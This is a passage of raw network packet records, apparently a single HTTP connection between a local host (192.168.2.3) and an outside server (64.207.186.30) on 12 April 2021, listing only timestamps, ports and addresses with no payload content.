Apr 12, 2021 17:12:29.539138079 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.539160967 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.539161921 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.539182901 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.539184093 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.539206028 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.539212942 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.539226055 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.539230108 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.539248943 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.539253950 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.539267063 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.539278030 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.539290905 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.539315939 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.540817976 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.540848970 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.540870905 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.540894985 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.540896893 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.540918112 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.540932894 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.540941000 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.540977001 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.671871901 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.671895981 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.671909094 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.671945095 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.671973944 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.672015905 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.672028065 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.672045946 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.672059059 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.672070980 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.672082901 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.672094107 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.672116995 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.672143936 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.672178984 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.672215939 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.672230005 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.672240973 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.672256947 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.672257900 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.672276974 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.672307014 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.672308922 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.672349930 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.672396898 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.672415018 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.672439098 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.672462940 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.672487974 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.672538996 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.672589064 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.672605991 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.672621012 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.672631025 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.672638893 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.672655106 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.672667027 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.672669888 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.672686100 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.672698021 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.672704935 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.672722101 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.672724009 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.672738075 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.672746897 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.672753096 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.672769070 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.672781944 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.672785044 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.672801018 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.672813892 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.672816038 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.672837019 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.672838926 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.672854900 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.672861099 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.672869921 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.672894001 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.672920942 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.672923088 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.672940016 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.672957897 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.672966957 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.672972918 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.672988892 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.673005104 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.673007965 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.673019886 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.673027039 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.673037052 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.673052073 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.673069000 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.673070908 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.673088074 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.673098087 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.673103094 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.673119068 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.673125982 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.673134089 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.673149109 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.673154116 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.673165083 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.673177004 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.673181057 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.673199892 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.673217058 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.673217058 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.673232079 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.673249006 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.673255920 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.673264027 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.673279047 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.673286915 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.673295021 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.673310041 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.673324108 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.673329115 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.673346043 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.673361063 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.673362970 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.673396111 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.673413038 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.673425913 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.673429966 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.673443079 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.673454046 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.673475027 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.673479080 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.673496962 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.673510075 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.673540115 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.802740097 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.802771091 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.802784920 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.802803040 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.803478003 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.803822041 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.803853035 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.803868055 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.803884029 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.803903103 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.803960085 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.803972960 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.803991079 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.804006100 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.804016113 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.804022074 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.804038048 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.804054022 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.804054022 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.804073095 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.804090023 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.804099083 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.804105043 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.804121017 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.804131985 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.804136992 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.804152966 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.804156065 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.804167986 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.804181099 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.804183006 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.804203033 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.804219007 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.804222107 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.804234982 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.804250956 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.804264069 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.804265976 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.804281950 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.804292917 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.804297924 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.804312944 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.804320097 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.804332018 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.804348946 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.804348946 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.804364920 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.804379940 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.804389000 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.804394960 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.804409981 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.804425955 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.804426908 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.804440975 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.804450989 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.804459095 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.804476023 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.804491043 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.804500103 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.804507017 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.804522038 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.804537058 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.804552078 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.804567099 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.804578066 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.804600000 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.804609060 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.804615021 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.804630995 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.804641962 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.804650068 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.804666042 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.804682970 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.804692984 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.804721117 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.804733992 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.804745913 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.804752111 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.804768085 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.804783106 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.804786921 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.804809093 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.804816008 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.804826975 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.804843903 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.804860115 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.804862022 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.804876089 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.804893017 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.804900885 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.804909945 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.804927111 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.804928064 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.804944038 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.804955959 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.804963112 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.804980040 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.804995060 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.805000067 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.805011988 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.805027008 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.805028915 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.805042982 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.805054903 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.805058956 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.805073977 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.805088043 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.805093050 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.805109978 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.805120945 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.805124998 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.805140018 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.805155993 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.805157900 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.805171013 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.805186033 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.805186987 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.805202007 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.805214882 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.805221081 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.805238008 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.805248022 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.805254936 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.805270910 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.805270910 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.805288076 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.805305004 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.805321932 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.805329084 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.805337906 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.805356979 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.805373907 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.805380106 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.805411100 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.805418015 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.805435896 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.805439949 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.805454969 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.805471897 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.805474997 CEST | 49714 | 80 | 192.168.2.3 | 64.207.186.30 |
Apr 12, 2021 17:12:29.805488110 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
Apr 12, 2021 17:12:29.805504084 CEST | 80 | 49714 | 64.207.186.30 | 192.168.2.3 |
